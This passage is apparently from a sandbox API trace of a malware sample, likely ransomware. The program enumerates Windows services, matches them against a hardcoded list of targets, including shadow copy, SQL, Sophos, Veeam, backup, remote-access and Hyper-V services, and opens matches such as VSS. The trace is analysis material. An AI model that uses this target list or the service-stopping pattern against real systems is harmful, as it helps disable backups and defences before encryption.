(lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0125.222] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0125.223] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0125.224] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0125.225] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0125.226] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0125.227] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0125.228] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0125.229] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0125.230] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0125.231] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0125.232] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0125.233] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0125.233] OpenServiceA (hSCManager=0x35858a0, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x3585a30 [0125.234] QueryServiceStatusEx (in: hService=0x3585a30, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0125.235] CloseServiceHandle (hSCObject=0x3585a30) returned 1 [0125.235] OpenServiceA (hSCManager=0x35858a0, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3585ad0 [0125.236] QueryServiceStatusEx (in: hService=0x3585ad0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0125.236] CloseServiceHandle (hSCObject=0x3585ad0) returned 1 [0125.243] OpenServiceA (hSCManager=0x35858a0, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x3585918 [0126.005] QueryServiceStatusEx (in: hService=0x3585918, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0126.006] CloseServiceHandle (hSCObject=0x3585918) returned 1 [0126.007] OpenServiceA (hSCManager=0x35858a0, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x3585aa8 [0126.007] QueryServiceStatusEx (in: hService=0x3585aa8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0126.008] Sleep (dwMilliseconds=0x3e8) [0127.263] QueryServiceStatusEx (in: hService=0x3585aa8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0127.264] GetTickCount () returned 0x1160c9a [0127.264] CloseServiceHandle (hSCObject=0x3585aa8) returned 1 [0127.265] OpenServiceA (hSCManager=0x35858a0, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x3585b70 [0127.266] QueryServiceStatusEx (in: hService=0x3585b70, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0127.267] CloseServiceHandle (hSCObject=0x3585b70) returned 1 [0127.267] OpenServiceA (hSCManager=0x35858a0, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x3585be8 [0127.268] QueryServiceStatusEx (in: hService=0x3585be8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0127.268] CloseServiceHandle (hSCObject=0x3585be8) returned 1 [0129.329] OpenServiceA (hSCManager=0x35858a0, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x3585968 [0129.330] QueryServiceStatusEx (in: hService=0x3585968, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0129.331] CloseServiceHandle (hSCObject=0x3585968) returned 1 [0129.342] GetProcessHeap () returned 0x3520000 [0129.343] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3586780 | out: hHeap=0x3520000) returned 1 [0129.343] CloseServiceHandle (hSCObject=0x35858a0) returned 1 [0129.344] SetEvent (hEvent=0x20c) returned 1 [0129.344] Sleep (dwMilliseconds=0x2710) [0139.372] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x35858a0 [0139.375] EnumServicesStatusA (in: hSCManager=0x35858a0, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0139.379] GetLastError () returned 0xea [0139.379] GetProcessHeap () returned 0x3520000 [0139.380] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x3586780 [0139.382] EnumServicesStatusA (in: hSCManager=0x35858a0, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x3586780, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x3586780*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0139.578] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0139.578] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0139.578] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0139.578] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0139.579] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0139.580] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0139.581] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0139.582] StrStrIA 